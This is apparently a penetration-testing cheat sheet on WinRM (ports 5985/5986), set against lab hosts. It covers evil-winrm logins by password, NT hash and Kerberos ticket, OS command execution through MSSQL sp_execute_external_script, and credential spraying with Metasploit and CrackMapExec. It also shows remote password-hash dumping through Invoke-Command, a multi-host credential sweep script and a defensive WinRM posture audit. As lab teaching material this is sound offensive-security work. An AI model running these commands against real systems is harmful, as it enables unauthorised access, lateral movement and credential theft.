# WinRM (5985, 5986)


## Nmap

```shell-session
nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n
```

## Evil-WinRM

```
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
```

If you get the error above when connecting, the cause is OpenSSL 3: NTLM authentication computes the NT hash with MD4, which OpenSSL 3 moved into the `legacy` provider that is not loaded by default, so Ruby's OpenSSL binding cannot initialise the digest. Enable the legacy provider in `/etc/ssl/openssl.cnf`: under the existing `[provider_sect]` add `legacy = legacy_sect`, uncomment `activate = 1` under `[default_sect]` (once any provider is activated explicitly, `default` is no longer loaded implicitly), and append the following section:

```
[legacy_sect]
activate = 1
```

Confirm with `openssl list -providers`, which should now list both `default` and `legacy`.

```shell-session
evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
```

```shell-session
# pass-the-hash: -H takes the NT hash only (the part after the colon in LM:NT)
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"
```

evil-winrm does not take a bare **IPv6 address** as its target. Add an entry to ***/etc/hosts*** mapping a **hostname** to the IPv6 address and pass that name to `-i`. In the example below the address was found through MSSQL `sp_execute_external_script` on a host reachable only over IPv6, then mapped to the name `compatibility`.

```
SQL (hacker  dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::7912:217c:56e7:f15b
   Link-local IPv6 Address . . . . . : fe80::d379:8c3e:971a:5199%8
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:fe94:1921%8
                                       10.13.38.2

Ethernet adapter Ethernet1 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Express Edition will continue to be enforced.

SQL (hacker  dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 
COMPATIBILITY

Express Edition will continue to be enforced.

```

```
# cat /etc/hosts | grep comp
dead:beef::1001 compatibility
```

```
# evil-winrm -u 'administrator' -p 'SecretPassword' -i compatibility
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

```

### With Kerberos

Evil-WinRM can authenticate with a Kerberos ticket instead of a password or hash. Four things must line up: a `/etc/krb5.conf` that maps the realm to its KDC, a TGT in the cache pointed to by `KRB5CCNAME`, the target passed as the FQDN that matches the `HTTP/<fqdn>` service principal (an IP address will not work, so the name must resolve via DNS or `/etc/hosts`), and a local clock within the KDC's tolerance (five minutes by default, so sync against the DC first). `-r` is the Kerberos realm; `-u` is ignored because the principal comes from the ticket, as the warning in the output says.

```
$ cat /etc/krb5.conf
[libdefaults]
    default_realm = DOMAIN.HTB

[realms]
    DOMAIN.HTB = {
        kdc = dc01.domain.htb
    }

[domain_realm]
    .domain.htb = DOMAIN.HTB
    domain.htb = DOMAIN.HTB        
```

```
$ impacket-getTGT 'domain.htb/username:password' -dc-ip 10.10.11.31 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in username.ccache

$ KRB5CCNAME=username.ccache evil-winrm -u username -i dc01.domain.htb -r domain.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents>

```

### With docker

```bash
docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'
```

{% content-ref url="/pages/5zE4duLRkawZtstWjbb7" %}
[Evil-WinRM](/0xss0rz/pentest/tools/evil-winrm.md)
{% endcontent-ref %}

### Upload

`*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop`

### Download

`*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip`

## Python - evil-winrm-py

{% embed url="https://github.com/adityatelange/evil-winrm-py" %}

## Metasploit

{% embed url="https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html" %}

{% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %}
[Metasploit](/0xss0rz/pentest/tools/metasploit.md)
{% endcontent-ref %}

```
msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful: 
```

## Netexec - CME

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

```shell-session
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)
```

### Command execution

```
[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB         10.129.202.136  445    WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.202.136  5985   WINSRV           [+] WINSRV\john:november (admin)
WINRM       10.129.202.136  5985   WINSRV           [+] Executed command (shell type: powershell)
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Directory: C:\
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Mode                LastWriteTime         Length Name
WINRM       10.129.202.136  5985   WINSRV           ----                -------------         ------ ----
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                PerfLogs
WINRM       10.129.202.136  5985   WINSRV           d-r---       12/14/2020   6:38 PM                Program Files
WINRM       10.129.202.136  5985   WINSRV           d-----        2/11/2022   6:10 AM                Program Files (x86)
WINRM       10.129.202.136  5985   WINSRV           d-r---         1/6/2022   6:49 AM                Users
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                Windows
WINRM       10.129.202.136  5985   WINSRV           
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace # 
```

## PSSession

{% hint style="success" %}
*Enabled by default on Windows Server 2012 and later, with a firewall exception for port 5985*
{% endhint %}

PowerShell Remoting (PSRemoting) runs over WinRM, so the same listener, ports and authentication rules as above apply; on the target, both a PSSession and an evil-winrm shell run inside a `wsmprovhost.exe` process.

On client editions, and on servers where it was turned off, enable it from an elevated prompt with `Enable-PSRemoting` (`-SkipNetworkProfileCheck` is needed when the active network profile is Public). Connecting to a host by IP address or outside the domain uses NTLM, which the client refuses unless the target is listed in `WSMan:\localhost\Client\TrustedHosts`.
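
As an added example (not from the original page or the linked guides), a function that reports a host's own WinRM posture: service state, listeners, who is permitted on each session endpoint, the client's TrustedHosts, and the firewall rules that carry the exception mentioned in the hint. It assumes an elevated prompt on a Windows 8 / Server 2012 or later host with the WSMan and NetSecurity modules present; the function name `Get-WinRMPosture` is mine.

```powershell
# Added example (not from the original page): audit this host's WinRM / PSRemoting
# exposure. Run elevated; Get-PSSessionConfiguration returns nothing otherwise.
function Get-WinRMPosture {
    $svc    = Get-Service WinRM -ErrorAction SilentlyContinue
    $status = if ($svc) { $svc.Status } else { 'not installed' }

    # Listeners: one container per transport. HTTPS only shows up if someone
    # created a certificate-backed listener; by default there is HTTP on 5985.
    $listeners = Get-ChildItem WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
        ForEach-Object {
            $props = Get-ChildItem $_.PSPath
            [pscustomobject]@{
                Transport = ($props | Where-Object Name -eq 'Transport').Value
                Address   = ($props | Where-Object Name -eq 'Address').Value
                Port      = ($props | Where-Object Name -eq 'Port').Value
                Enabled   = ($props | Where-Object Name -eq 'Enabled').Value
            }
        }

    # Session endpoints and the principals allowed on each: Administrators and
    # Remote Management Users are the defaults, anything else is a finding.
    $endpoints = Get-PSSessionConfiguration -ErrorAction SilentlyContinue |
        Select-Object Name, Permission

    # Client side: names in TrustedHosts receive this box's NTLM credentials
    # without any server authentication, so a '*' entry is a real weakness.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts -ErrorAction SilentlyContinue).Value

    # The firewall exception the hint refers to, per network profile.
    $fw = Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
        Where-Object Enabled -eq 'True' |
        Select-Object DisplayName, Profile, Direction

    [pscustomobject]@{
        ServiceStatus = $status
        Listeners     = $listeners
        Endpoints     = $endpoints
        TrustedHosts  = $trusted
        FirewallRules = $fw
    }
}

$posture = Get-WinRMPosture
"WinRM service: $($posture.ServiceStatus)  TrustedHosts: '$($posture.TrustedHosts)'"
$posture.Listeners     | Format-Table -AutoSize
$posture.Endpoints     | Format-Table -AutoSize
$posture.FirewallRules | Format-Table -AutoSize
```

Run it before `Enable-PSRemoting` to get the baseline and again afterwards; the new HTTP listener on `*:5985`, the `microsoft.powershell` endpoints and the enabled `Windows Remote Management (HTTP-In)` rules are exactly the surface the rest of this page attacks.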

{% embed url="https://www.sans.org/blog/powershell-remoting-part-1/" %}

{% embed url="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4" %}

{% embed url="https://www.nbs-system.com/expertise/guide-des-commandes-via-powershell-remoting-utiles-en-test-d-intrusion/" %}

### Create a session on a remote computer

```powershell
$Server01 = New-PSSession -ComputerName Server01
```

### List PSSession

```powershell
Get-PSSession
```

### Enter-PSSession

To use the **PSSession** to interact directly with a remote computer, use the `Enter-PSSession` cmdlet

```
PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT
[SEC504STUDENT]: PS C:\Users\Sec504\Documents>

[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Get-Service | Where-Object -Property Status -EQ Running

Status   Name               DisplayName
------   ----               -----------
Running  AarSvc_75beb       Agent Activation Runtime_75beb
Running  Appinfo            Application Information
Running  AppXSvc            AppX Deployment Service (AppXSVC)
Running  AudioEndpointBu... Windows Audio Endpoint Builder
Running  Audiosrv           Windows Audio
Running  BFE                Base Filtering Engine
...

[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>
```

### Pass Username / password

```powershell
# -Session reuses the existing session $s as a template (same computer and configuration);
# to target a host directly, use -ComputerName Server01 instead. A user name string
# given to -Credential makes PowerShell prompt for the password.
New-PSSession -Session $s -Credential Domain01\User01
```

With a variable

```
PS C:\WINDOWS\system32> $cred = Get-Credential

cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
PS C:\WINDOWS\system32> $cred

UserName                     Password
--------                     --------
sec504   System.Security.SecureString
```

Or

```powershell
$Username = "USERNAME"
$SecurePassword = "PLAINPASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$PScred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$SecurePassword
```

```powershell
$cred = New-Object Management.Automation.PSCredential ("Administrator", (ConvertTo-SecureString "Sup3Rp@ssw0rd" -AsPlainText -Force))
```

```
PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT -Credential $cred
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> $env:USERNAME
Sec504
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>
```

Interact with an existing session

```powershell
Enter-PSSession -Id 19
Enter-PSSession -Name Session1
Enter-PSSession -Session $session1
```

### Execute command or scriptblocks

```powershell
Invoke-Command -ScriptBlock{hostname;whoami} -Session $session1
Invoke-Command -ScriptBlock{C:\Users\Public\hostname.ps1} -Session $session1

Invoke-Command -ScriptBlock{Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -FilePath C:\scripts\script.ps1 -ComputerName (Get-Content <list_of_servers>)
```

Execute a locally loaded function on the remote machines. `${function:Name}` sends the function body as the scriptblock, so the function does not need to exist on the target (`Get-PassHashes` here is, for example, the Nishang function).

```powershell
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

# positional arguments for the function's param() block
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList $Arg1,$Arg2
```

Stateful commands

```powershell
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
```
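
The credential, `Invoke-Command` and stateful-session steps above, combined into one sweep over several hosts, as an added example that is not from the original page. Host names, account and password are placeholders; `Test-WSMan` is used as an unauthenticated liveness check so a dead host does not cost a logon attempt, and every failure is recorded per host instead of aborting the loop.

```powershell
# Added example (not from the original page): sweep WinRM hosts with one credential,
# one reusable session per host, per-host error capture and a variable that
# persists inside each session between two Invoke-Command calls.
# Placeholders (assumptions): the host list, the account and the password.
$Targets  = @('srv01.domain.htb', 'srv02.domain.htb')
$UserName = 'DOMAIN\user'
$Plain    = 'P455w0rD!'          # in real use take it from Get-Credential instead

$Cred = New-Object System.Management.Automation.PSCredential (
    $UserName, (ConvertTo-SecureString $Plain -AsPlainText -Force)
)

# Runs in the session's runspace, so $Survey stays defined there afterwards.
$SurveyBlock = {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $Survey = [pscustomobject]@{
        Host     = $env:COMPUTERNAME
        User     = $id.Name
        IsAdmin  = ([System.Security.Principal.WindowsPrincipal]$id).IsInRole(
                       [System.Security.Principal.WindowsBuiltInRole]::Administrator)
        Profiles = (Get-ChildItem C:\Users -Directory -ErrorAction SilentlyContinue).Name -join ','
    }
}

$Results  = New-Object System.Collections.Generic.List[object]
$Sessions = New-Object System.Collections.Generic.List[object]

foreach ($Target in $Targets) {
    $row = [ordered]@{ Target = $Target; Host = $null; User = $null
                       IsAdmin = $null; Profiles = $null; Error = $null }
    try {
        # Unauthenticated WS-Man Identify on 5985: is WinRM answering at all?
        $null = Test-WSMan -ComputerName $Target -ErrorAction Stop

        # One session per host; bad password, TrustedHosts and firewall errors land in catch.
        $s = New-PSSession -ComputerName $Target -Credential $Cred -ErrorAction Stop
        $Sessions.Add($s)

        # First call defines $Survey inside the session, second call reads it back:
        # the session is stateful, like $Proc in the snippet above.
        Invoke-Command -Session $s -ScriptBlock $SurveyBlock -ErrorAction Stop
        $r = Invoke-Command -Session $s -ScriptBlock { $Survey } -ErrorAction Stop

        $row.Host = $r.Host; $row.User = $r.User
        $row.IsAdmin = $r.IsAdmin; $row.Profiles = $r.Profiles
    } catch {
        $row.Error = $_.Exception.Message
    }
    $Results.Add([pscustomobject]$row)
}

$Results | Format-Table -AutoSize

# Each open session holds a logon on its host; tear them down when finished.
$Sessions | Remove-PSSession
```

A target given by IP address or outside the domain makes `New-PSSession` fall back to NTLM, which the client refuses unless the name is in `WSMan:\localhost\Client\TrustedHosts`; that error shows up in the `Error` column for that host while the rest of the sweep continues. `IsAdmin` reflects the token the remote session actually got, which is what decides whether the later upload, download and credential-dumping steps will work on that host.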

## Winrs

```
winrs -remote:server1 -u:server1\administrator -p:passw0rd hostname
```

## WSMan-WinRM

{% embed url="https://github.com/bohops/WSMan-WinRM" %}

## Resources

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm" %}

{% embed url="https://www.hackingarticles.in/winrm-penetration-testing/" %}

{% embed url="https://pentestlab.blog/2018/05/15/lateral-movement-winrm/" %}

